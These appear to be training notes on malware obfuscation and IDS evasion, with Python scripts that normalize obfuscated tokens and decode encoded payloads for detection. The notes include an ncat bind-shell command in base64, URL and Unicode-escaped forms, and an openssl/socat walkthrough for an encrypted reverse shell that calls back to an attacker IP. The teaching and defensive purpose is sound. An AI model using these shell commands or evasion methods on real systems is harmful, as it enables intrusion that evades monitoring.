CyberNotes

Obfuscation

Malware obfuscation is a technique used by malicious actors to hide or disguise the true nature and functionality of their code, making it harder for security software to detect and for analysts to understand.

Concatenation

Language     Concatenation operator
Python       "+"
PowerShell   "+", ",", "$", or no operator at all
C#           "+", "String.Join", "String.Concat"
C            "strcat"
C++          "+", "append"
Character    Purpose                                                               Example
Breaks       Break a single string into multiple substrings and combine them       ('co'+'ffe'+'e')
Reorders     Reorder a string's components                                         ('{1}{0}' -f 'ffee','co')
Whitespace   Include whitespace that is not interpreted                            ( 'Ne' +'w-Ob' + 'ject')
Ticks        Include ticks (backticks) that are not interpreted                    downLoAdString
Random Case  Tokens are generally not case sensitive and can be any arbitrary case dOwnLoAdsTRing
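The table above describes the tricks from the attacker's side; a detection rule has to undo them before a token comparison means anything. The following Python script is an added example (not code from the original page) of that normalization step: it strips backticks, unwraps grouping parentheses, resolves a PowerShell -f reorder, joins '+'-concatenated literals regardless of whitespace, and case-folds the result, then compares it against a watchlist. The sample tokens are constructed from the rows of the table, and the watchlist entries, the function names normalize and flag_tokens, and the name WATCHLIST are choices made here.

```python
import re

# Constructed sample tokens, one per row of the table above (not taken from any real script).
SAMPLES = [
    "('co'+'ffe'+'e')",
    "('{1}{0}' -f 'ffee','co')",
    "( 'Ne' +'w-Ob' + 'ject')",
    "d`own`LoAd`String",
    "dOwnLoAdsTRing",
]

# Hypothetical watchlist of canonical tokens a detection rule would look for.
WATCHLIST = {"downloadstring", "new-object"}

_LITERAL = r"'([^']*)'"


def _fold_format(expr):
    """Resolve PowerShell's -f reordering: '{1}{0}' -f 'ffee','co' -> coffee."""
    m = re.fullmatch(r"'([^']*)'\s*-f\s*(.+)", expr)
    if not m:
        return None
    fmt, args = m.group(1), re.findall(_LITERAL, m.group(2))
    try:
        return re.sub(r"\{(\d+)\}", lambda p: args[int(p.group(1))], fmt)
    except IndexError:  # placeholder with no matching argument: leave it alone
        return None


def normalize(token):
    """Return the canonical, case-folded form of one obfuscated token."""
    s = token.strip()
    # Ticks: outside double-quoted strings a backtick only escapes the next character,
    # so removing them restores the bare token (this ignores `n/`t escapes inside "..." strings).
    s = s.replace("`", "")
    # Unwrap grouping parentheses around a sub-expression.
    while s.startswith("(") and s.endswith(")"):
        s = s[1:-1].strip()
    # Reorders: resolve a -f format expression if present.
    folded = _fold_format(s)
    if folded is not None:
        s = folded
    # Breaks and whitespace: join '+'-concatenated literals, ignoring spaces around '+'.
    elif re.fullmatch(r"'[^']*'(\s*\+\s*'[^']*')*", s):
        s = "".join(re.findall(_LITERAL, s))
    # Random case: PowerShell tokens are case-insensitive, so compare case-folded.
    return s.lower()


def flag_tokens(tokens, watchlist=WATCHLIST):
    """Return the canonical forms of the tokens that hit the watchlist, in input order."""
    hits = []
    for t in tokens:
        canon = normalize(t)
        if canon in watchlist:
            hits.append(canon)
    return hits


if __name__ == "__main__":
    for t in SAMPLES:
        print(f"{t!r:32} -> {normalize(t)}")
    print("watchlist hits:", flag_tokens(SAMPLES))
```

The point of the script is that all five rows collapse to two canonical strings: a rule written against the raw text would need a separate pattern for every variation, while a rule run after normalization needs one entry per token.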
Obfuscation method           Purpose
Junk code                    Add junk instructions that are non-functional, also known as code stubs
Separation of related code   Separate related code or instructions to make the program harder to read
Stripping redundant symbols  Strip symbolic information such as debug information or other symbol tables
Meaningless identifiers      Transform a meaningful identifier into something meaningless
Implicit controls            Convert explicit control instructions into implicit ones
Dispatcher-based controls    Determine the next block to be executed at runtime
Probabilistic control flows  Introduce replicas of a control flow with the same semantics but different syntax
Bogus control flows          Control flows deliberately added to a program that will never be executed

Code Flow

Logic statement   Purpose
if/else           Executes a code block only if a condition is met, otherwise executes a different block
try/catch         Tries to execute a code block and catches the error if it fails, to handle errors
switch case       Follows similar conditional logic to an if statement but checks several possible conditions with cases before resolving to a break or default
for/while loop    A for loop executes a set number of times; a while loop executes until its condition is no longer met

Example

# Python 3.10+ (uses match/case). Junk values and a dispatcher variable (swVar)
# drive a flattened control flow; the real payload is a string assembled one
# character at a time from the case tables below.
x = 3
swVar = 1
a = 112340857612345      # junk initial value, overwritten in case 1
b = 1122135047612359087  # junk initial value, overwritten in case 1
i = 0
case_1 = ["T","d","4","3","3","3","e","1","g","w","p","y","8","4"]
case_2 = ["1a","H","3a","4a","5a","3","7a","8a","d","10a","11a","12a","!","14a"]
case_3 = ["1b","2b","M","4b","5b","6b","c","8b","9b","3","11b","12b","13b","14b"]
case_4 = ["1c","2c","3c","{","5c","6c","7c","8c","9c","10c","d","12c","13c","14c"]
case_5 = ["1d","2d","3d","4d","D","6d","7d","o","9d","10d","11d","!","13d","14d"]
case_6 = ["1e","2e","3e","4e","5e","6e","7e","8e","9e","10e","11e","12e","13e","}"]

# Bogus control flow: a Collatz-style loop that always reaches x == 1 before the payload runs.
while(x > 1):
    if(x % 2 == 1):
        x = x * 3 + 1
    else:
        x = x / 2
    if(x == 1):
        # Dispatcher-based control: swVar selects the next block at runtime, so the
        # order in which the tables are read is not visible from the source layout.
        for y in case_1:
            match swVar:
                case 1:
                    print(case_1[i])
                    a = 2
                    b = 214025
                    swVar = 2
                case 2:
                    print(case_2[i])
                    if(a > 10):
                        swVar = 6
                    else:
                        swVar = 3
                case 3:
                    print(case_3[i])
                    b = b + a

                    if(b < 10):
                        swVar = 5
                    else:
                        swVar = 4
                case 4:
                    print(case_4[i])
                    b -= b

                    swVar = 5
                case 5:
                    print(case_5[i])
                    a += a

                    swVar = 2
                case 6:
                    print(case_5[11])
                    print(case_6[i])
                    break
            i = i + 1
# Traced by hand, the dispatcher prints one character per line: T H M { D 3 c o d 3 d ! ! ! }

Encode to base64

$ cat input.txt 
> ncat -lvnp 1234 -e /bin/bash
$ base64 input.txt 
> bmNhdCAtbHZucCAxMjM0IC1lIC9iaW4vYmFzaA==

URL Encoding

URL encoding converts certain characters to the form %HH, where HH is the hexadecimal ASCII representation. English letters, period, dash, and underscore are not affected.

One utility that you can easily install on your Linux system is urlencode, by running the command sudo apt install gridsite-clients.

$ urlencode ncat -lvnp 1234 -e /bin/bash 
> ncat%20-lvnp%201234%20-e%20%2Fbin%2Fbash

Escaped Unicode

Some applications will still process your input and execute it properly if you use escaped Unicode.

You can use CyberChef to select and configure the Escape Unicode Characters recipe:

  1. Search for Escape Unicode Characters
  2. Drag it to the Recipe column
  3. Ensure you have a check-mark near Encode all chars with a prefix of \u
  4. Ensure you have a check-mark near Uppercase hex with a padding of 4

If you use the format \uXXXX, then ncat -lvnp 1234 -e /bin/bash becomes:

\u006e\u0063\u0061\u0074\u0020\u002d\u006c\u0076
\u006e\u0070\u0020\u0031\u0032\u0033\u0034\u0020
\u002d\u0065\u0020\u002f\u0062\u0069\u006e\u002f
\u0062\u0061\u0073\u0068

It is clearly a drastic transformation that would help you evade detection, assuming the target system will interpret it correctly and execute it.
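Each of the three encodings above (base64, URL encoding, escaped Unicode) is reversible without a key, so a detection pipeline can simply peel them off before matching. The following Python script is an added example (not code from the original page) of that decoding step: it tries each decoder in turn, repeats until nothing changes, reports which layers it removed, and then searches the plaintext for indicators. The three inputs are the page's own ncat command in the encoded forms shown above; the indicator list, the function names decode_layers and find_indicators, and the base64 heuristic are choices made here.

```python
import base64
import binascii
import re
from urllib.parse import unquote

# Constructed inputs: the ncat command from the sections above in each encoded form shown there.
SAMPLES = [
    "bmNhdCAtbHZucCAxMjM0IC1lIC9iaW4vYmFzaA==",
    "ncat%20-lvnp%201234%20-e%20%2Fbin%2Fbash",
    r"\u006e\u0063\u0061\u0074\u0020\u002d\u006c\u0076\u006e\u0070\u0020\u0031\u0032\u0033\u0034"
    r"\u0020\u002d\u0065\u0020\u002f\u0062\u0069\u006e\u002f\u0062\u0061\u0073\u0068",
]

# Hypothetical indicators a detection rule would search for once the payload is in the clear.
INDICATORS = ("ncat", "/bin/bash")

_B64 = re.compile(r"^[A-Za-z0-9+/]{8,}={0,2}$")
_UNI = re.compile(r"\\u([0-9A-Fa-f]{4})")


def _text_like(s):
    return all(c.isprintable() or c in "\r\n\t" for c in s)


def _try_base64(s):
    s = s.strip()
    if len(s) % 4 or not _B64.match(s):
        return None
    try:
        out = base64.b64decode(s, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    # Short alphanumeric words can be valid base64 by accident; requiring printable ASCII
    # output cuts most of those false positives but does not remove them entirely.
    return out if _text_like(out) else None


def _try_url(s):
    if "%" not in s:
        return None
    out = unquote(s)
    return None if out == s else out


def _try_unicode(s):
    if not _UNI.search(s):
        return None
    return _UNI.sub(lambda m: chr(int(m.group(1), 16)), s)


DECODERS = (("base64", _try_base64), ("url", _try_url), ("unicode-escape", _try_unicode))


def decode_layers(s, max_depth=5):
    """Peel encodings until no decoder changes the text; return (plaintext, layer names)."""
    layers = []
    for _ in range(max_depth):
        for name, fn in DECODERS:
            out = fn(s)
            if out is not None:
                layers.append(name)
                s = out
                break
        else:
            break  # no decoder applied: s is as plain as it gets
    return s, layers


def find_indicators(s, indicators=INDICATORS):
    """Decode, then match; returns (plaintext, layers removed, matched indicators)."""
    plain, layers = decode_layers(s)
    return plain, layers, [i for i in indicators if i in plain]


if __name__ == "__main__":
    for sample in SAMPLES:
        plain, layers, hits = find_indicators(sample)
        print(f"{' > '.join(layers) or 'plain':16} {plain!r} hits={hits}")
```

Because the loop re-applies every decoder after each successful step, a payload wrapped in more than one layer (for example URL-encoded text that was then base64-encoded) is unwrapped as well, up to max_depth layers; the base64 check deliberately rejects decoded output that is not printable text, which is the main source of false positives for that decoder.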

Encrypt the Communication Channel

Because an IDS/IPS won’t inspect encrypted data, an attacker can take advantage of encryption to evade detection. Unlike encoding, encryption requires an encryption key.

One direct approach is to create the necessary encryption key on the attacker’s system and set socat to use the encryption key to enforce encryption as it listens for incoming connections. An encrypted reverse shell can be carried out in three steps:

  1. Create the key
  2. Listen on the attacker’s machine
  3. Connect to the attacker’s machine

First, on the AttackBox or any Linux system, create the private key and certificate using openssl.

openssl req -x509 -newkey rsa:4096 -days 365 -subj '/CN=www.redteam.thm/O=Red Team THM/C=UK' -nodes -keyout thm-reverse.key -out thm-reverse.crt

The arguments in the above command are:

  • req indicates that this is a certificate signing request. Obviously, we won’t submit our certificate for signing.
  • -x509 specifies that we want an X.509 certificate
  • -newkey rsa:4096 creates a new certificate request and a new private key using RSA, with the key size being 4096 bits. (You can use other options for RSA key size, such as -newkey rsa:2048.)
  • -days 365 shows that the validity of our certificate will be one year
  • -subj sets data, such as organization and country, via the command-line.
  • -nodes simplifies our command and does not encrypt the private key
  • -keyout PRIVATE_KEY specifies the filename where we want to save our private key
  • -out CERTIFICATE specifies the filename to which we want to write the certificate request

The above command returns:

  • Private key: thm-reverse.key
  • Certificate: thm-reverse.crt

socat expects a single Privacy Enhanced Mail (PEM) file that contains both the private key (.key) and the certificate (.crt). We can use cat to create that PEM file from the two files we have just created:

cat thm-reverse.key thm-reverse.crt > thm-reverse.pem

Second, with the PEM file ready, we can start listening while using the key to encrypt the communication with the client.

socat -d -d OPENSSL-LISTEN:4443,cert=thm-reverse.pem,verify=0,fork STDOUT

The options that we used are:

  • -d -d provides some debugging data (fatal, error, warning, and notice messages)
  • OPENSSL-LISTEN:PORT_NUM indicates that the connection will be encrypted using OPENSSL
  • cert=PEM_FILE provides the PEM file (certificate and private key) to establish the encrypted connection
  • verify=0 disables verification of the peer's certificate
  • fork creates a sub-process to handle each new connection.

Third, on the victim system, connect back to the listener:

socat OPENSSL:10.20.30.1:4443,verify=0 EXEC:/bin/bash

  • Note that EXEC: invokes the specified program.
